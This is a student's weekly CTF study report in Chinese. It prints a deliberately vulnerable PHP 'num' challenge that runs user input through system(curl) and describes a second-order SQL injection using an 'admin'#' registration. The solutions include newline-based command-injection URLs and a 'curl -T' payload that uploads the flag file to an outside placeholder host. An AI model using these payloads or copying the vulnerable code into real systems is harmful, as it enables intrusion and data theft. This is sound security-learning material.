汇报人：黄昱卓<br />时间：10月29号
<a name="Wyw8T"></a>
## 本周内容：
1.完成比赛的欠的writeup<br />2.继续学习php<br />3.学习修补了文件上传漏洞<br />4.刚接触sql
<a name="FHNVN"></a>
## 成果展示：
<a name="IeC9d"></a>
## 1.num!
```php
<?php
  // error_reporting(E_ALL || ~E_NOTICE);
  highlight_file('./yun.php');
function strreplace($str){
  $str = str_replace('`','',$str);
  $str = str_replace(';','',$str);
  $str = str_replace('|','',$str);
  $str = str_replace('&','',$str);
  $str = str_replace('>','',$str);
  $str = str_replace(')','',$str);
  $str = str_replace('(','',$str);
  $str = str_replace(')','',$str);
  $str = str_replace('{','',$str);
  $str = str_replace('}','',$str);
  $str = str_replace('%','',$str);
  $str = str_replace('#','',$str);
  $str = str_replace('!','',$str);
  $str = str_replace('?','',$str);
  $str = str_replace('@','',$str);
  $str = str_replace('+','',$str);
  return $str;
}
if($_GET['num']<>""){

  $num = $_GET['num'];
  if(strstr($num,'1')){
    die("Sorry");
  }elseif($num <> 1){
    echo "Try to num = 1";
  }
  if($num == 1 ){
    echo "what you want!"."</br>";
    $cmd=trim($_GET['cmd']);
    $cmd=strreplace($cmd);
    var_dump("curl$cmd/flag.php");
    system("curl$cmd/flag.php");
  }
}else{echo "It Works!why not ask yun.php?";}
?> 
```
首先利用php的0.99999999999999999999999999会溢出到1<br />然后后面是一个并行执行的绕过<br />我们用%0a绕过,注意%检测不检测url编码

![QQ截图20231022124848.png](https://cdn.nlark.com/yuque/0/2023/png/39135006/1698155492069-4a257e9f-0635-4b11-a736-07d9b88860f1.png#averageHue=%23fbfbfb&clientId=u03b559ec-9ea7-4&from=drop&height=773&id=u3fcc7ce6&originHeight=1551&originWidth=2571&originalType=binary&ratio=1&rotation=0&showTitle=false&size=171373&status=done&style=none&taskId=uef5e0dbb-a230-466b-ad18-feb4d7615c6&title=&width=1282)<br />[http://121.41.166.172:81/?num=0.9999999999999999999&cmd=$IFS$9%20%0a%20cat%20.](http://121.41.166.172:81/?num=0.9999999999999999999&cmd=$IFS$9%20%0a%20cat%20.)<br />这题有个bug就是yun.php传参不能执行，而在根目录传参可以<br />网上有第二种解法<br />http://106.75.32.87:16888/index.php?num=0.99999999999999999999999999999999999&cmd=$IFS-T flag.php -a http://xxxx:xx<br /> 利用curl -T可以上传文件，利用这个上传flag<br />2.sql入门
<a name="sD0uh"></a>
## 2.Sql-injection2
简单的sql<br />是二次注入类题目，万能密码试了用不了<br />先注册admin'#<br />![image.png](https://cdn.nlark.com/yuque/0/2023/png/39135006/1698156812421-158470f7-e8fb-469b-98fd-0100a8f465cb.png#averageHue=%2302fdfd&clientId=u03b559ec-9ea7-4&from=paste&height=594&id=u2e937009&originHeight=594&originWidth=821&originalType=binary&ratio=1&rotation=0&showTitle=false&size=42606&status=done&style=none&taskId=u7d5ca086-9c80-41f5-99e6-d0c8061c037&title=&width=821)这样应该就闭合了<br />重新登陆试试![image.png](https://cdn.nlark.com/yuque/0/2023/png/39135006/1698156872027-d3676565-3226-4930-9586-b13989c4ccfa.png#averageHue=%2302f9f9&clientId=u03b559ec-9ea7-4&from=paste&height=174&id=u23deddda&originHeight=174&originWidth=1072&originalType=binary&ratio=1&rotation=0&showTitle=false&size=26959&status=done&style=none&taskId=u62da0239-9008-430b-946b-daf57e11978&title=&width=1072)<br />查看cookies：没有<br />但是在请求头里面有<br />![image.png](https://cdn.nlark.com/yuque/0/2023/png/39135006/1698156973103-c4a5113b-4377-47a7-a9bc-2319be092be3.png#averageHue=%232d2d2d&clientId=u03b559ec-9ea7-4&from=paste&height=432&id=ue6e851c3&originHeight=432&originWidth=861&originalType=binary&ratio=1&rotation=0&showTitle=false&size=36010&status=done&style=none&taskId=ue47ec6a5-d126-4e51-90df-307bf0809ea&title=&width=861)<br />原理是利用sql语句的闭合和半闭合<br />可以插入自定义的附加信息，或者是改变原有账户密码
<a name="i3tMQ"></a>
## 心得：
这周干的事情不多，时间忙在了把vps整好和研究怎么用docker搭建靶场上，做了做极客大挑战，下周目标是把php的其他内容再搞一搞，做做极客大挑战
